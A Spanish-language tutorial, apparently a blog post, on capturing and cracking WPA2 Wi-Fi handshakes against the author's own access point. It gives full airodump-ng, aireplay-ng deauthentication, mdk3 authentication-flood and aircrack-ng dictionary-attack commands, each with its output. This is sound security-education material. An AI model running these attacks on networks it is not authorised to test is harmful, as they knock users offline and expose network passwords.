Temas
- ¿Qué es un Handshake?
- Tipos de ataques para capturar un Handshake
- Validación del Handshake
- Cracking con Aircrack
¿Qué es un Handshake?
En redes Wi-Fi, es posible extraer la clave de un AP (Access Point) mediante la obtención de un Handshake, el cual solo es un acuerdo entre cliente (Usuario) y servidor (Access Point) para comenzar una comunicación, logrando así un enlace con el AP. En el Handshake se encuentran una serie de parámetros entre los cuales está el Hash de la red, es decir la clave Wi-Fi cifrada.
El Handshake es generado únicamente cuando se asocia o re-asocia un cliente a un AP, es decir cuando un cliente que posee la clave Wi-Fi se conecta de manera exitosa a la red. Para capturar un Handshake, el cual está viajando por el aire, se debe monitorizar toda la red con una tarjeta Wi-FI que cuente con modo monitor, esto permitirá exportar un fichero con todo el tráfico de la red Wi-Fi, adicional a esto, dicho fichero se podrá analizar con herramientas como tshark o wireshark.
Tipos de ataques para capturar un Handshake
Para poder realizar la captura de un Handshake de forma exitosa primeramente se debe contar con una tarjeta de red adecuada, la cual se pondrá en modo monitor, como se describe en el post Fundamentos para empezar auditar la seguridad de las redes Wi-Fi.
👉 Lo escrito aquí es con fines educativos, no me hago responsable del uso que se le pueda llegar a dar, todos los ataques realizados fueron contra mi propio AP, así que recuerda realizar estas prácticas en un entorno controlado. 💥🚨💥
El éxito del ataque contra el AP dependerá de la distancia a la cual nos encontremos del mismo, entre más cerca se encuentre, habrá más probabilidad de llevar con éxito el ataque y de igual manera capturar el Handshake.
Identificación de la red objetivo 🕵️
Con la suit de Aircrack se realiza un análisis del entorno, para así poder identificar la red objetivo, para este caso la tarjeta de red que se usa lleva como nombre wlan0mon, con el comando airodump-ng wlan0mon se inicia el análisis del entorno.
┌─[root@ParrotSec]─[/home/jonatanng/Desktop/WIFI]
└──╼ # airodump-ng wlan0mon
CH 11 ][ Elapsed: 11 s ][ 2022-01-21 14:36
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
30:D3:FB:XX:XX:XX -80 19 1 0 1 180 WPA2 CCMP PSK XXXXXXXX
XX:XX:XX:D4:16:78 -69 23 13 0 11 130 WPA2 CCMP PSK XXXXXXXX
D4:F7:2D:XX:XX:XX -79 29 4 0 11 135 WPA2 CCMP PSK XXXXXXXX
XX:XX:XX:F6:F7:D8 -81 15 0 0 6 130 WPA2 CCMP PSK XXXXXXXX
F8:8E:85:XX:XX:XX -85 14 0 0 9 130 WPA CCMP PSK XXXXXXXX
XX:XX:XX:99:A9:09 -85 17 0 0 1 130 WPA2 CCMP PSK XXXXXXXX
XX:XX:XX:XX:XX:XX -90 2 0 0 6 195 WPA2 CCMP PSK XXXXXXXX
BSSID STATION PWR Rate Lost Frames Probe
XX:XX:XX:B1:A9:09 34:8E:85:XX:XX:XX -27 0 - 2e 0 1
Por defecto airodump captura solo canales que se encuentren en una frecuencia de 2,4 GHz. La red a la cual se le capturará el Handshake se encuentra en una frecuencia de 5Ghz, por esto es necesario aplicar un filtro que permita visualizar solo redes de 5Ghz.
┌─[root@ParrotSec]─[/home/jonatanng/Desktop/WIFI]
└──╼ # airodump-ng --band a wlan0mon
CH 149 ][ Elapsed: 11 s ][ 2022-01-21 14:38
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
30:D3:FB:XX:XX:XX -80 19 1 0 149 180 WPA2 CCMP PSK WifiLab
XX:XX:XX:D4:16:78 -69 23 13 0 132 130 WPA2 CCMP PSK XXXXXXXX
D4:F7:2D:XX:XX:XX -79 29 4 0 136 135 WPA2 CCMP PSK XXXXXXXX
BSSID STATION PWR Rate Lost Frames Probe
30:D3:FB:XX:XX:XX 34:8E:85:XX:XX:XX -27 0 - 2e 0 1
30:D3:FB:XX:XX:XX 25:6Y:78:XX:XX:XX -26 0 - 2e 0 1
Una vez aplicado el filtro --band a el cual solo muestra redes en frecuencias de 5Ghz, se puede visualizar como la red objetivo WifiLab, esta se encuentra disponible en el canal 149, ahora bien, vamos a aplicar una serie de filtros para que airodump se centre únicamente en la red objetivo, la cual tienen como ESSID WifiLab.
┌─[root@ParrotSec]─[/home/jonatanng/Desktop/WIFI]
└──╼ # airodump-ng --band a -c 149 -w Captura --essid WifiLab wlan0mon
CH 149 ][ Elapsed: 11 s ][ 2022-01-21 14:39
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
30:D3:FB:XX:XX:XX -80 19 1 0 149 180 WPA2 CCMP PSK WifiLab
BSSID STATION PWR Rate Lost Frames Probe
30:D3:FB:XX:XX:XX 34:8E:85:XX:XX:XX -27 0 - 2e 0 1
30:D3:FB:XX:XX:XX 25:6Y:78:XX:XX:XX -26 0 - 2e 0 1
Explicación del comando airodump-ng --band a -c 149 -w Captura --essid WifiLab wlan0mon
airodump-ngherramienta utilizada para analizar el entorno.- La opción
--band amuestra únicamente redes en frecuencias de 5Ghz. - La opción
-c 149filtra únicamente las redes que se encuentren en ese canal 149. - La opción
-w Capturacrea un ficheros con toda la información de la red, incluyendo el Handshake. - La opción
--essid WifiLabse le indica que solamente se va a monitorizar esa red en específico. - El nombre de la tarjeta es
wlan0mon.
👉 Para todos los tipos de ataques a realizar, se debe tener en cuenta el estar monitorizando constantemente la red objetivo con airodump y en otra terminal llevar a cabo el ataque, con el fin de que airodump avise de la captura del Handshake 💥🚨💥
Ataque de Deautenticación dirigido
Una vez identificada la red objetivo, con airodump se podran observar los clientes asociados a la red, esto permitirá desautenticar a un cliente en específico, ya que se podrá visualizar la MAC del los clientes conectados al AP.
Este proceso se puede llevar a cabo de dos maneras distintas indicando el BSSID del AP con el comando aireplay-ng -0 10 -a 30:D3:FB:XX:XX:XX -c 25:6Y:78:XX:XX:XX wlan0mon o indicando el ESSID del AP con aireplay-ng -0 10 -e WifiLab -c 25:6Y:78:XX:XX:XX wlan0mon.
Explicación de las opciones usadas
aireplay-ngherramienta utilizada para realizar diferentes tipos de ataques.- La opción
-0se le indica que es un ataque de Desautenticación. - La opción
10envía 10 paquetes de Desautenticación si es0puede mantener desconectado el dispositivo hasta que se pare el ataque. - La opción
-e WifiLabnombre (ESSID) del AP. - La opción
-a 30:D3:FB:XX:XX:XXMAC (BSSID) del AP. - La opción
-c 25:6Y:78:XX:XX:XXcliente el cual va a ser desconectado. - El nombre de la tarjeta es
wlan0mon.
┌─[root@ParrotSec]─[/home/jonatanng/Desktop/WIFI]
└──╼ # aireplay-ng -0 10 -a 30:D3:FB:XX:XX:XX -c 25:6Y:78:XX:XX:XX wlan0mon
14:40:28 Waiting for beacon frame (BSSID: 30:D3:FB:XX:XX:XX) on channel 149
14:40:29 Sending 64 directed DeAuth (code 7). STMAC: [25:6Y:78:XX:XX:XX] [18|65 ACKs]
14:40:29 Sending 64 directed DeAuth (code 7). STMAC: [25:6Y:78:XX:XX:XX] [11|63 ACKs]
14:40:30 Sending 64 directed DeAuth (code 7). STMAC: [25:6Y:78:XX:XX:XX] [ 0|64 ACKs]
14:40:30 Sending 64 directed DeAuth (code 7). STMAC: [25:6Y:78:XX:XX:XX] [14|66 ACKs]
14:40:31 Sending 64 directed DeAuth (code 7). STMAC: [25:6Y:78:XX:XX:XX] [17|63 ACKs]
14:40:32 Sending 64 directed DeAuth (code 7). STMAC: [25:6Y:78:XX:XX:XX] [ 0|64 ACKs]
14:40:32 Sending 64 directed DeAuth (code 7). STMAC: [25:6Y:78:XX:XX:XX] [24|66 ACKs]
14:40:33 Sending 64 directed DeAuth (code 7). STMAC: [25:6Y:78:XX:XX:XX] [ 0|64 ACKs]
14:40:33 Sending 64 directed DeAuth (code 7). STMAC: [25:6Y:78:XX:XX:XX] [ 0|64 ACKs]
14:40:34 Sending 64 directed DeAuth (code 7). STMAC: [25:6Y:78:XX:XX:XX] [ 0|64 ACKs]
Para saber si aireplay está ejecutando correctamente el ataque de Desautenticación los ACKs deben ser mayor que 0 [17|63 ACks], esto indica que los paquetes están llegando correctamente. Una vez el dispositivo se intente reconectarse a la red, airodump indicará que se ha generado el Handshake.
┌─[root@ParrotSec]─[/home/jonatanng/Desktop/WIFI]
└──╼ # airodump-ng --band a -c 149 -w Captura --essid WifiLab wlan0mon
CH 149 ][ Elapsed: 11 s ][ 2022-01-21 14:39 ][ WPA handshake: 30:D3:FB:XX:XX:XX
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
30:D3:FB:XX:XX:XX -80 19 1 0 149 180 WPA2 CCMP PSK WifiLab
BSSID STATION PWR Rate Lost Frames Probe
30:D3:FB:XX:XX:XX 34:8E:85:XX:XX:XX -27 0 - 2e 0 1
30:D3:FB:XX:XX:XX 25:6Y:78:XX:XX:XX -26 0 - 2e 0 1
💥🚨💥 Importante: para realizar ataques a redes en frecuencias de 5Ghz, la potencia de la antena debe estar en 30 dBm, ya que por defecto algunas antenas siempre se encuentra 20 dBm. 💥🚨💥
Ataque de Deautenticación global
A diferencia del anterior ataque (Ataque de Deautenticación dirigido) que elimina únicamente a un dispositivo de la red. El Ataque de Deautenticación global saca a todos los clientes asociados al AP, suele ser más efectivo pero más intrusivo, y de dejarse corriendo puede dejar inoperativa la red Wi-Fi.
Con aireplay se puede llevar a cabo el ataque, la primera forma es indicándole una Broadcast MAC Address aireplay-ng -0 10 -e WifiLab -c FF:FF:FF:FF:FF:FF wlan0mon, otra forma es NO indicándole una Broadcast MAC Address aireplay-ng -0 10 -e WifiLab wlan0mon, de igual forma aireplay interpretará esto como un ataque de Deautenticación global.
Explicación de las opciones usadas
aireplay-ngherramienta utilizada para realizar diferentes tipos de ataques.- La opción
-0se le indica que es un ataque de Desautenticación. - La opción
10envía 10 paquetes de Desautenticación si es0puede mantener inoperativa la red. - La opción
-e WifiLabnombre (ESSID) del AP. - La opción
-c FF:FF:FF:FF:FF:FFse interpreta como un ataque de Deautenticación global. - El nombre de la tarjeta es
wlan0mon.
┌─[root@ParrotSec]─[/home/jonatanng/Desktop/WIFI]
└──╼ # aireplay-ng -0 10 -e WifiLab wlan0mon
14:45:33 Waiting for beacon frame (ESSID: WifiLab) on channel 149
Found BSSID "30:D3:FB:XX:XX:XX" to given ESSID "WifiLab".
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
14:45:34 Sending DeAuth (code 7) to broadcast -- BSSID: [30:D3:FB:XX:XX:XX]
14:45:34 Sending DeAuth (code 7) to broadcast -- BSSID: [30:D3:FB:XX:XX:XX]
14:45:34 Sending DeAuth (code 7) to broadcast -- BSSID: [30:D3:FB:XX:XX:XX]
14:45:34 Sending DeAuth (code 7) to broadcast -- BSSID: [30:D3:FB:XX:XX:XX]
14:45:35 Sending DeAuth (code 7) to broadcast -- BSSID: [30:D3:FB:XX:XX:XX]
14:45:35 Sending DeAuth (code 7) to broadcast -- BSSID: [30:D3:FB:XX:XX:XX]
14:45:35 Sending DeAuth (code 7) to broadcast -- BSSID: [30:D3:FB:XX:XX:XX]
14:45:36 Sending DeAuth (code 7) to broadcast -- BSSID: [30:D3:FB:XX:XX:XX]
14:45:36 Sending DeAuth (code 7) to broadcast -- BSSID: [30:D3:FB:XX:XX:XX]
14:45:37 Sending DeAuth (code 7) to broadcast -- BSSID: [30:D3:FB:XX:XX:XX]
Una vez ejecutado el ataque los dispositivos desconectados intentarán conectarse a la red, y en ese momento se pueden generar múltiples Handshake de los diferentes dispositivos que se intentan re asociar a la red. De igual forma airodump indicará que se ha generado el Handshake del AP.
Ataque de Autenticación
Para este ataque se realiza lo contrario, en vez de expulsar clientes se le hará creer al AP que se le están conectando múltiples clientes, en realidad no es que nos conectemos a la red es un simple engaño para saturar el AP con demasiados clientes, logrando así que el mismo AP expulse a todos los clientes y lograr la re-asociación de clientes verdaderos para la obtención del Handshake.
Para autenticar un cliente se ejecuta con aireplay de la siguente forma:
aireplay-ng -1 0 -e WifiLab -h 00:A0:8C:AD:02:65 wlan0mon.
Explicación de las opciones usadas
aireplay-ngherramienta utilizada para realizar diferentes tipos de ataques.- La opción
-1se le indica que es un ataque de Autenticación. - La opción
0tiempo de re-asociación en segundos. - La opción
-e WifiLabnombre (ESSID) del AP. - La opción
-h 00:A0:8C:AD:02:65MAC de la tarjeta de red, para simular un cliente. - El nombre de la tarjeta es
wlan0mon.
┌─[root@ParrotSec]─[/home/jonatanng/Desktop/WIFI]
└──╼ # aireplay-ng -1 0 -e WifiLab -h 00:A0:8C:AD:02:65 wlan0mon
14:50:35 Waiting for beacon frame (ESSID: WifiLab) on channel 149
Found BSSID "30:D3:FB:XX:XX:XX" to given ESSID "WifiLab".
14:50:38 Sending Authentication Request (Open System) [ACK]
14:50:38 Authentication successful
14:50:38 Sending Association Request [ACK]
14:50:38 Association successful :-) (AID: 1)
Con airodump se observa que la asociación fue exitosa.
┌─[root@ParrotSec]─[/home/jonatanng/Desktop/WIFI]
└──╼ # airodump-ng --band a -c 149 -w Captura --essid WifiLab wlan0mon
CH 149 ][ Elapsed: 11 s ][ 2022-01-21 14:51 ][
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
30:D3:FB:XX:XX:XX -80 19 1 0 149 180 WPA2 CCMP PSK WifiLab
BSSID STATION PWR Rate Lost Frames Probe
30:D3:FB:XX:XX:XX 00:A0:8C:AD:02:65 -27 0 - 2e 0 11
30:D3:FB:XX:XX:XX 34:8E:85:XX:XX:XX -27 0 - 2e 0 1
30:D3:FB:XX:XX:XX 25:6Y:78:XX:XX:XX -26 0 - 2e 0 1
Para saturar el AP no basta con inyectar un solo cliente, se necesita una cantidad considerable para que el AP se congestione, como un ataque DoS. Para esto con la herramienta mdk3 inyectaremos de forma masiva múltiples clientes de la siguiente forma:
mdk3 wlan0mon a -a 30:D3:FB:XX:XX:XX.
Explicación de las opciones usadas
mdk3herramienta utilizada para realizar el ataque.- El nombre de la tarjeta es
wlan0mon. - La opción
amodo DoS de autenticación envía marcos de autenticación al AP. Demasiados clientes congelan o reinician algunos AP. - La opción
-a 30:D3:FB:XX:XX:XXlanza en ataque contra el AP especificado.
┌─[root@ParrotSec]─[/home/jonatanng/Desktop/WIFI]
└──╼ # mdk3 wlan0mon a -a 30:D3:FB:XX:XX:XX
AP 30:D3:FB:XX:XX:XX is responding!
AP 30:D3:FB:XX:XX:XX seems to be INVULNERABLE!
Device is still responding with 500 clients connected!
AP 30:D3:FB:XX:XX:XX seems to be INVULNERABLE!
Device is still responding with 1000 clients connected!
AP 30:D3:FB:XX:XX:XX seems to be INVULNERABLE!
Device is still responding with 1500 clients connected!
AP 30:D3:FB:XX:XX:XX seems to be INVULNERABLE!
Device is still responding with 2000 clients connected!
AP 30:D3:FB:XX:XX:XX seems to be INVULNERABLE!
Device is still responding with 2500 clients connected!
Con airodump se observa que múltiples clientes están siendo conectados al AP, de igual forma cuando se detenga el ataque y algún cliente se intente reconectar a la red en ese momento se capturara el Handshake.
┌─[root@ParrotSec]─[/home/jonatanng/Desktop/WIFI]
└──╼ # airodump-ng --band a -c 149 -w Captura --essid WifiLab wlan0mon
CH 149 ][ Elapsed: 11 s ][ 2022-01-21 14:53 ][ WPA handshake: 30:D3:FB:XX:XX:XX
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
30:D3:FB:XX:XX:XX -80 19 1 0 149 180 WPA2 CCMP PSK WifiLab
BSSID STATION PWR Rate Lost Frames Probe
(not associated) AC:D1:B8:17:91:C0 -73 0 - 1 12 25
(not associated) 22:19:BA:9B:7D:F5 0 0 - 1 0 1
30:D3:FB:XX:XX:XX 05:3C:7C:94:75:D8 0 0 - 1 0 1
30:D3:FB:XX:XX:XX BE:61:89:F9:5C:BB 0 0 - 1 0 1
30:D3:FB:XX:XX:XX A8:99:0F:95:B1:EB 0 0 - 1 0 1
30:D3:FB:XX:XX:XX F1:B3:05:EF:F7:00 0 0 - 1 0 1
30:D3:FB:XX:XX:XX E9:A1:3A:E5:CA:0B 0 0 - 1 0 1
30:D3:FB:XX:XX:XX CB:D0:48:47:64:BD 0 0 - 1 0 1
30:D3:FB:XX:XX:XX 1F:23:1E:A8:1C:7B 0 0 - 1 0 1
30:D3:FB:XX:XX:XX AF:3B:33:CD:E3:50 0 0 - 1 0 1
30:D3:FB:XX:XX:XX 34:41:5D:46:D1:38 -30 1e- 6e 0 223
30:D3:FB:XX:XX:XX 3E:A1:41:E1:FC:67 0 0 - 1 0 1
30:D3:FB:XX:XX:XX 21:3D:DC:87:70:E9 0 0 - 1 0 1
30:D3:FB:XX:XX:XX 54:11:0E:82:74:41 0 0 - 1 0 1
30:D3:FB:XX:XX:XX AB:B2:CD:C6:9B:B4 0 0 - 1 0 1
30:D3:FB:XX:XX:XX 05:17:58:E9:5E:D4 0 0 - 1 0 1
30:D3:FB:XX:XX:XX 31:58:A3:5A:25:5D 0 0 - 1 0 1
30:D3:FB:XX:XX:XX C9:9A:66:32:0D:B7 0 0 - 1 0 1
30:D3:FB:XX:XX:XX 76:5A:2E:63:33:9F 0 0 - 1 0 1
30:D3:FB:XX:XX:XX EC:B0:3B:FB:32:AF 0 0 - 1 0 1
30:D3:FB:XX:XX:XX 3C:54:EC:18:DB:5C 0 0 - 1 0 1
30:D3:FB:XX:XX:XX 02:1A:FE:43:FB:FA 0 0 - 1 0 1
30:D3:FB:XX:XX:XX AA:3A:FB:29:D1:E6 0 0 - 1 0 1
De no parar el ataque múltiples clientes seguirán siendo conectados al AP y la red puede llegar a quedar inoperativa.
Validación del Handshake
Para validar si en realidad airodump ha capturado el Handshake se puede realizar desde otra herramienta, pyrit además de ser una excelente opción para el cracking, puede analizar archivos .cap el cual lo entrega airodump con el parámetro -w, para analizar la captura con pyrit se realiza de la siguiente forma:
pyrit -r Captura-01.cap analyze
Explicación de las opciones usadas
pyritherramienta para el cracking y análisis de capturas.- La opción
-r Captura-01.capse le indica la captura a tratar. - La opción
analyzerealiza el análisis de la captura indicada.
┌─[root@ParrotSec]─[/home/jonatanng/Desktop/WIFI]
└──╼ # pyrit -r Captura-01.cap analyze
Pyrit 0.5.1 (C) 2008-2011 Lukas Lueg - 2015 John Mora
https://github.com/JPaulMora/Pyrit
This code is distributed under the GNU General Public License v3+
Parsing file 'Captura-01.cap' (1/1)...
Parsed 6 packets (6 802.11-packets), got 1 AP(s)
#1: AccessPoint 30:D3:FB:XX:XX:XX ('WifiLab'):
No valid EAOPL-handshake + ESSID detected.!
Esta captura NO cuenta con ningún Handshake y pyrit lo indica de la siguiente forma No valid EAOPL-handshake + ESSID detected.
┌─[root@ParrotSec]─[/home/jonatanng/Desktop/WIFI]
└──╼ # pyrit -r Captura-01.cap analyze
Pyrit 0.5.1 (C) 2008-2011 Lukas Lueg - 2015 John Mora
https://github.com/JPaulMora/Pyrit
This code is distributed under the GNU General Public License v3+
Parsing file 'Captura-01.cap' (1/1)...
Parsed 67 packets (67 802.11-packets), got 1 AP(s)
#1: AccessPoint 30:D3:FB:XX:XX:XX ('WifiLab'):
#1: Station 25:6Y:78:XX:XX:XX, 6 handshake(s):
#1: HMAC_SHA1_AES, good*, spread 1
#2: HMAC_SHA1_AES, good*, spread 1
#3: HMAC_SHA1_AES, good*, spread 21
#4: HMAC_SHA1_AES, good*, spread 21
#5: HMAC_SHA1_AES, bad*, spread 8
#6: HMAC_SHA1_AES, bad*, spread 30
Ahora, esta captura cuenta con 6 Handshake, pero en realidad con uno es suficiente para realizar fuerza bruta.
Cracking con Aircrack
Para romper la contraseña que está almacenada en el Handshake se usa la herramienta aircrack-ng, si la contraseña se encuentra en el diccionario especificado aircrack-ng se detendrá y la mostrara en texto plano, la manera de emplear aircrack-ng es la siguiente:
aircrack-ng -w /usr/share/wordlists/rockyou.txt Captura-01.cap
Explicación de las opciones usadas
aircrack-ngherramienta para cracking.- La opción
-w /usr/share/wordlists/rockyou.txtse le indica el diccionario a usar. - La opción
Captura-01.capse le indica la captura que contiene el Handshake.
┌─[root@ParrotSec]─[/home/jonatanng/Desktop/WIFI]
└──╼ # aircrack-ng -w /usr/share/wordlists/rockyou.txt Captura-01.cap
Reading packets, please wait...
Opening Captura-01.cap
Read 3653 packets.
# BSSID ESSID Encryption
1 30:D3:FB:XX:XX:XX WifiLab WPA (1 handshake)
Choosing first network as target.
Reading packets, please wait...
Opening Captura-01.cap
Read 3653 packets.
1 potential targets
Aircrack-ng 1.6
[00:00:00] 84/10303727 keys tested (660.94 k/s)
Time left: 4 hours, 19 minutes, 49 seconds 0.00%
KEY FOUND! [ 123456789 ]
Master Key : 9B A1 9D 99 E1 42 2E 4F DF 5B D9 CC 57 D9 6C 99
D5 F8 DE 6E 06 49 3E CB 4D FC E5 DA BC 69 0B 6A
Transient Key : 31 B0 D3 9C CF 75 98 D5 66 92 68 C6 6C 71 9A 85
7B 7D B2 F1 9D A0 5A B9 36 AC 70 32 4B 30 A2 4E
2C 45 B6 EE 42 FB 65 6C 1C 02 8E BD 30 05 F8 76
42 7C BD 62 37 70 AD 20 30 D0 8F 63 3F 90 46 81
EAPOL HMAC : F7 80 FF FD 13 C8 68 A7 2C E9 5C 67 68 4B 47 2E
El tiempo para encontrar la contraseña dependerá de la complejidad de la misma, que tan robusto sea el diccionario y de nuestra velocidad de cómputo es decir de la CPU.